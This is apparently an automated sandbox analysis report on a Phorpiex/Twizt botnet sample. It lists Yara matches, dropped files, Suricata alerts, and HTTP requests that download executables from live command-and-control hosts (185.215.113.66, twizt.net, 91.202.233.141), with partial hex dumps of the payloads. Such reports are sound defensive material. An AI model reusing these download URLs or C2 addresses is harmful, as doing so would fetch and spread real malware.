                              Source: Yara matchFile source: 17.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 26.0.2658326577.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 26.2.2658326577.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 4.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.2.71384504.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 71384504.exe PID: 7464, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 7488, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 8108, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 2658326577.exe PID: 1400, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\2658326577.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\sysppvrdnvs.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\71384504.exe, type: DROPPED
                              Source: thcdVit1dX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeFile created: C:\Users\user\AppData\Local\Temp\Setup_20241026012616_Failed.logJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                              Source: Binary string: D:\a\wix\wix\build\burn\Release\x86\burn.pdbA source: thcdVit1dX.exe
                              Source: Binary string: D:\a\wix\wix\build\burn\Release\x86\burn.pdb source: thcdVit1dX.exe
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004050E3 FindFirstFileW,FindClose,0_2_004050E3
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0045C110 FindFirstFileExW,0_2_0045C110
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0041D64B FindFirstFileW,FindNextFileW,FindClose,0_2_0041D64B
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00401D86 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,FindClose,0_2_00401D86
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,3_2_004068E0
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_004067A0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,4_2_004068E0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_004067A0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,17_2_004068E0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,17_2_004067A0

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2856563 - Severity 1 - ETPRO MALWARE Phorpiex Domain in DNS Lookup : 192.168.2.5:54677 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49771 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65053 -> 195.82.3.15:40500
                              Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 185.215.113.66:80 -> 192.168.2.5:49720
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49784 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65053 -> 2.184.189.189:40500
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49823 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2853292 - Severity 1 - ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin : 192.168.2.5:49721 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.5:49784
                              Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65053 -> 2.180.10.247:40500
                              Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65053 -> 151.246.159.157:40500
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49864 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49812 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 185.215.113.66:80 -> 192.168.2.5:49720
                              Source: Network trafficSuricata IDS: 2853272 - Severity 1 - ETPRO MALWARE Win32/Phorpiex Bot Executable Payload Inbound : 185.215.113.66:80 -> 192.168.2.5:49720
                              Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.5:49771
                              Contains functionality to check if Internet connection is working
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com3_2_0040B430
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com4_2_0040B430
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com17_2_0040B430
                              Source: global trafficTCP traffic: 192.168.2.5:49788 -> 149.54.47.90:40500
                              Source: global trafficTCP traffic: 192.168.2.5:49829 -> 89.33.234.8:40500
                              Source: global trafficTCP traffic: 192.168.2.5:49873 -> 89.249.62.7:40500
                              Source: global trafficUDP traffic: 192.168.2.5:65053 -> 195.82.3.15:40500
                              Source: global trafficUDP traffic: 192.168.2.5:65053 -> 2.184.189.189:40500
                              Source: global trafficUDP traffic: 192.168.2.5:65053 -> 151.246.159.157:40500
                              Source: global trafficUDP traffic: 192.168.2.5:65053 -> 2.180.10.247:40500
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:26:17 GMTContent-Type: application/octet-streamContent-Length: 9728Last-Modified: Wed, 15 May 2024 14:33:59 GMTConnection: keep-aliveETag: "6644c7d7-2600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 64 0e 23 23 05 60 70 23 05 60 70 23 05 60 70 2a 7d f3 70 21 05 60 70 2a 7d f5 70 22 05 60 70 2a 7d e3 70 36 05 60 70 04 c3 1b 70 28 05 60 70 23 05 61 70 18 05 60 70 2a 7d e4 70 20 05 60 70 2a 7d f1 70 22 05 60 70 52 69 63 68 23 05 60 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b8 c7 44 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 0e 00 00 00 14 00 00 00 00 00 00 19 17 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 3f d4 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 24 00 00 8c 00 00 00 00 40 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 23 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7a 0c 00 00 00 10 00 00 00 0e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 0a 00 00 00 20 00 00 00 0c 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 03 00 00 00 30 00 00 00 02 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 40 00 00 00 04 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fe 01 00 00 00 50 00 00 00 02 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:26:20 GMTContent-Type: application/octet-streamContent-Length: 85504Last-Modified: Thu, 10 Oct 2024 07:41:50 GMTConnection: keep-aliveETag: "6707853e-14e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a4 84 07 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ee 00 00 00 70 00 00 00 00 00 00 40 79 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 01 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 30 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 86 ed 00 00 00 10 00 00 00 ee 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f2 3f 00 00 00 00 01 00 00 40 00 00 00 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 2e 00 00 00 40 01 00 00 1c 00 00 00 32 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: Joe Sandbox ViewIP Address: 185.215.113.66 185.215.113.66
                              Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                              Source: Joe Sandbox ViewASN Name: KAZTELECOM-ASKZ KAZTELECOM-ASKZ
                              Source: Joe Sandbox ViewASN Name: TCIIR TCIIR
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49721 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49720 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49771 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49784 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49823 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49841 -> 91.202.233.141:80
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49864 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49812 -> 185.215.113.66:80
                              Source: global trafficHTTP traffic detected: GET /pei.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
                              Source: global trafficHTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /dwntbl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 149.54.47.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 149.54.47.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 149.54.47.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 149.54.47.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 149.54.47.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 149.54.47.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004C9000 EntryPoint,GetFileAttributesW,LoadLibraryExA,GetTempFileNameW,URLDownloadToFileW,DeleteFileW,CreateProcessW,0_2_004C9000
                              Source: global trafficHTTP traffic detected: GET /pei.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
                              Source: global trafficHTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /dwntbl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
